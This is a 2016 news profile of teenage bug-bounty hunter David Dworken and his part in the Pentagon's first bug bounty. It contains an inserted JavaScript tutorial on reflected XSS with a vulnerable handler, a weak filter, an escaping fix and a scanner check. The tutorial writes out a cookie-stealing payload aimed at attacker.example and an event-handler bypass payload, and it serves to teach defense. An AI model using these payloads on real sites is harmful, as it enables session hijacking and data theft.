- June 22, 2016
- Posted by: Kerry Tomlinson, Archer News
- Category: Data Breach, Hacking
One of the kids who may save your digital future just graduated from high school and landed at the Pentagon for a hacker tribute.
His first hack was a calculator. In middle school, someone told David Dworken he could program the TI-83+ he was using in class. Not long after, he turned the calculator into a game of Pong.
“I do remember my math teacher giving me one of the manuals for the calculators and being unbelievably excited to read it,” Dworken said. “When our teachers gave us time to read whatever we wanted, I read the calculator manual.”
Now 18, Dworken is one of the new superheroes of Generation Z, a hacker for good who will help protect your safety in your connected home, car and world. He went from high school graduation last week to the Pentagon, receiving a nod from Secretary of Defense Ash Carter in a live briefing on the first-ever Hack the Pentagon bug bounty program.
Read more: “What it’s like to actually hack the Pentagon.”
He hopes other teens will join him in the battle to defend against malicious attacks.
“I would absolutely recommend that people my age get into cybersecurity,” Dworken told Archer News. “In my opinion, the world of cybersecurity needs more people,” he added. “Just looking around the news, I always am reading about how company X was hacked or company Y’s data was leaked, and I believe that bug bounty programs can help put a stop to this.”
Bug fever started for Dworken in tenth grade. In Advanced Computer Science class at Maret School in Washington, D.C., he and another student found a security hole—a bug in the password reset form on the school’s site.
“Throughout that year’s class our teacher always reminded us that our programs should be able to properly handle invalid input,” he explained. “So a friend and I were looking at our school’s website to see whether or not it did.”
They tested it, and “noticed bizarre output from it.” The form was reflecting what they typed straight back into the page without encoding it. That is a vulnerability called XSS, or cross-site scripting: an attacker crafts input that the site echoes as live HTML or script, so a victim’s browser runs the attacker’s code with the site’s own privileges, letting it rewrite what the page shows and steal session cookies or other data.
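To make the bug concrete, here is an added example (not code from the article, from the school’s site, or from Dworken’s own tools) of a password-reset page that reflects the submitted address: the vulnerable version, the naive “strip script tags” fix that does not work, the output-encoding fix that does, and the canary check a scanner uses to spot the reflection in the first place. All payloads, addresses and hostnames are constructed for the demonstration.

```javascript
// Added example (not the article's, the school's, or Dworken's code):
// reflected XSS in a password-reset confirmation page, three ways to
// render it, and the check a scanner runs to find the bug.
// Every input below is constructed for this demonstration.

// Vulnerable handler: echoes the submitted address straight into the HTML.
function renderResetVulnerable(email) {
  return `<p>If an account exists for ${email}, a reset link has been sent.</p>`;
}

// Tempting but wrong fix: strip <script> blocks. Attackers do not need them;
// any tag with an event-handler attribute runs code just as well.
function naiveScriptFilter(input) {
  return String(input).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}
function renderResetNaive(email) {
  return `<p>If an account exists for ${naiveScriptFilter(email)}, a reset link has been sent.</p>`;
}

// Correct fix for an HTML text context: encode the characters that change how
// the browser parses the page. (Attribute, URL and JavaScript contexts each
// need their own encoder; this one is only for text between tags.)
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderResetSafe(email) {
  return `<p>If an account exists for ${escapeHtml(email)}, a reset link has been sent.</p>`;
}

// What a scanner does: submit a canary containing the dangerous characters and
// check whether it comes back byte-for-byte. If it does, the page reflects
// input without encoding and deserves manual follow-up.
const CANARY = "\"'<xsscanary>";
function reflectsUnencoded(render) {
  return render(CANARY).includes(CANARY);
}

// Constructed payloads: a classic cookie-stealing script, and an event-handler
// payload that slips past a script-tag blacklist.
const SCRIPT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const EVENT_PAYLOAD = '<img src=x onerror="alert(document.domain)">';

// Rough check used below: does the rendered HTML contain a script element or
// any tag carrying an on* event-handler attribute?
function containsActiveHtml(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Walk-through for the reader.
for (const [name, render] of [
  ["vulnerable", renderResetVulnerable],
  ["naive filter", renderResetNaive],
  ["html-encoded", renderResetSafe],
]) {
  console.log(`${name}: reflects canary unencoded = ${reflectsUnencoded(render)}`);
  console.log(`  script payload executes = ${containsActiveHtml(render(SCRIPT_PAYLOAD))}`);
  console.log(`  event payload executes  = ${containsActiveHtml(render(EVENT_PAYLOAD))}`);
}
```

The canary check is the cheap, automatable part; deciding whether an unencoded reflection is actually exploitable in a given context (text, attribute, script block, URL) is the manual work that takes the time.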
“When we showed this to our computer science teacher, he walked us through sending a report to the website developers so it could be fixed,” Dworken said. “This really got me interested in cybersecurity and from there the interest blossomed. The experience was absolutely exhilarating and seeing it fixed was almost as satisfying as finding it.”
Why turn it in, instead of using it to wreak havoc on the school, as some malicious hackers or unscrupulous students might?
“Fundamentally, I just believe that it is the right thing to do—and this is what drives all of the cybersecurity work I do,” said Dworken. “Exploiting it would have caused a lot of problems for a lot of people, so morally it just isn’t right.”
First bug bounty
After the school site discovery, he taught himself more about cybersecurity, and then started trying bug bounty programs, where organizations offer rewards to hackers who ferret out security gaps in their sites and programs.
He began with organizations that promised no money but instead a spot on their list of successful vulnerability researchers.
“At first, I was mostly focusing on programs that offered ‘hall of fames’—since people generally paid less attention to them, so it was easier,” Dworken said. “From there I started to work on ones that offered free swag—T-shirts, generally.”
Soon, he was ready to try a money contest. He spent time on the sites of Bugcrowd and HackerOne, both bug bounty program organizations, and earned about $100 every few weeks.
Just months from graduation, his bug-finding skills produced big results.
“Just earlier this year, I became very successful while participating in Uber’s bug bounty program,” he said. “From four vulnerabilities I reported, I received almost $8,000 in bounties!”
The list of organizations he has helped by finding bugs includes Western Union, Amazon, eBay, Netflix, MailChimp, Adobe, AT&T, Tumblr, GoDaddy, IBM and many other companies, according to his resume and website. All of this came while going through his senior year in high school, serving as captain of the school’s engineering team, building robots and taking Advanced Placement classes to earn college credit.
Hack the Pentagon
Dworken first heard about the new Hack the Pentagon program on NPR in March.
“Even at that point, I immediately knew that I wanted to participate in the program, since it so clearly contributed to the greater good,” he said.
The race to find the Department of Defense bugs launched on April 18—just as his senior year schoolwork intensified.
“Time was definitely at a premium for me in that time period since AP [Advanced Placement] exams were coming up,” he said.
But he did not give up, instead working it in during free periods at school, before class, or between homework assignments, logging a total of 10 to 15 hours testing Pentagon cyber defenses.
“Ultimately, this meant I didn’t spend as much time on it as I would have liked, so I’m very excited for future bug bounties coming from the government,” Dworken said.
The rewards for Dworken from the Pentagon’s first bug bounty program are not monetary.
“Some of the first vulnerabilities I found, I found relatively quickly using a set of custom programs for scanning for common web vulnerabilities. So those are the ones I reported within the first day of the program,” Dworken said. “After that, it was mostly manual searching for vulnerabilities which is much more time-consuming.”
He was one of the 252 people who submitted bug reports in the contest, but not one of the 117 who got paid. He reported six vulnerabilities, but all turned out to be duplicates of other researchers’ work. Others split a total of $71,200 in prizes.
Dworken, however, was one of two hackers selected to stand to the right of Carter during the live briefing from the Pentagon last week. He smiled broadly during the briefing, and received a handshake and a challenge coin from Carter in thanks.
“In terms of lessons learned, I was unbelievably impressed with the Pentagon and the government as a whole for the creation of this program,” Dworken said. “The willingness and eagerness to follow industry best practices in the creation of a bug bounty program is amazing, and I hope that it will expand to more and more of the government.”
The Pentagon has indeed promised more bug bounties and expanded resources for white hat hackers in the months to come. Still, there are hundreds of thousands of cybersecurity jobs in the U.S. government and worldwide that may go unfilled if young people do not take on the challenge of learning cybersecurity.
Dworken is willing to try to help his peers.
“Well, I would try to convince them that it isn’t boring—e.g., show them an XSS on a website displaying their name. And if that isn’t enough to convince them, then I would frankly leave it at that,” he said. “I think one of the most important things in cybersecurity is truly being passionate about it,” Dworken added. “It is the passion for the topic that justifies spending free time working on bug bounties.”